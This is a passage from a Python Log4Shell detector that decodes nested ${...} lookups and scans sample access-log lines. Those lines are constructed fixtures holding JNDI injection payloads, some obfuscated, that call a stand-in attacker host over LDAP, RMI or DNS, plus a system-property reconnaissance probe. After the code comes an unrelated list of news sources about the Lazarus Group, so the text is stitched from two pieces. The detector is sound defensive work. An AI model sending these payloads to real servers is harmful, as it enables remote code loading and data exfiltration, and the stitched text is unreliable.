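    # Any other lookup (jndi:, env:, sys:, ...) is kept literally so it is not lost.
    return match.group(0)


def normalize(text, max_passes=32):
    """Percent-decode, then collapse nested lookups from the inside out."""
    # Two decoding rounds handle double-encoded payloads such as %2524%257B.
    text = unquote(unquote(text))
    for _ in range(max_passes):
        resolved = _INNER.sub(_resolve_inner, text)
        if resolved == text:  # nothing left that this evaluator knows how to expand
            break
        text = resolved
    return text


def find_jndi(text):
    """Return the normalized ${jndi:...} token carried by text, or None."""
    match = _JNDI_TOKEN.search(normalize(text))
    return match.group(0) if match else None


def scan_lines(lines):
    """List (1-based line number, normalized token) for lines carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        token = find_jndi(line)
        if token:
            hits.append((number, token))
    return hits


# Constructed sample access-log lines (not real traffic). The payload rides in the
# User-Agent field or the query string, both of which applications commonly log.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:LDAP}://198.51.100.7:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${env:NaN:-n}di:rmi://198.51.100.7:1099/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:06 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.10 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${sys:java.version}"',
]

if __name__ == "__main__":
    for number, token in scan_lines(SAMPLE_LINES):
        print(f"line {number}: {token}")
```

The last sample line, a bare ${sys:java.version} probe, is deliberately not flagged: it is a reconnaissance lookup rather than a JNDI fetch, and a production rule would usually alert on any unexpanded ${...} lookup reaching a log sink as a lower-severity signal.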
Source Document References
Information about the Lazarus Group threat actor was read from the documents listed below. This list is limited to 20 results.
Source | Created | Title
BankInfoSecurity | 8 days ago | Cryptohack Roundup: $230M WazirX Exploit in India
DARKReading | 22 days ago | Euro 2024 Becomes Latest Sporting Event to Attract Cyberattacks
BankInfoSecurity | a month ago | Cryptohack Roundup: Conviction in Home Invasions Case
BankInfoSecurity | a month ago | Cryptohack Roundup: Norway Freezes Hacked Ronin Funds
DARKReading | 2 months ago | Russia Aims Cyber Operations at Summer Olympics
DARKReading | 2 months ago | LilacSquid APT Employs Open Source Tools, QuasarRAT
BankInfoSecurity | 2 months ago | RedTail Cryptomining Malware Exploits PAN-OS Vulnerability
BankInfoSecurity | 2 months ago | Microsoft Warns of North Korea's 'Moonstone Sleet'
Fortinet | 3 months ago | Key Findings from the 2H 2023 FortiGuard Labs Threat Report | FortiGuard Labs
BankInfoSecurity | 3 months ago | Cryptohack Roundup: Geosyn Fraud Lawsuit
DARKReading | 3 months ago | 3 DPRK APTs Spied on South Korea Defense Industry
BankInfoSecurity | 3 months ago | Cryptohack Roundup: First Conviction in Smart Contract Hack
DARKReading | 3 months ago | DPRK Exploits 2 MITRE Sub-Techniques: Phantom DLL Hijacking, TCC Abuse
CERT-EU | 4 months ago | Remilia Founder Claims Hacking Amid Ether and NFT Transfers (National Cyber Security Consulting)
CERT-EU | 4 months ago | North Korean hackers are laundering millions worth of crypto through a sanctioned 'mixer'
CERT-EU | 4 months ago | Hackers like Lazarus continue to use Tornado Cash despite US sanctions (National Cyber Security Consulting)
CERT-EU | 4 months ago | Lazarus Group taps Tornado Cash to launder Heco Bridge, HTX hack proceeds (National Cyber Security Consulting)
CERT-EU | 4 months ago | North Korean Hackers Used Tornado Cash to Launder $12M From Heco Bridge Hack: Elliptic (National Cyber Security Consulting)
DARKReading | 4 months ago | 150K+ UAE Network Devices & Apps Exposed Online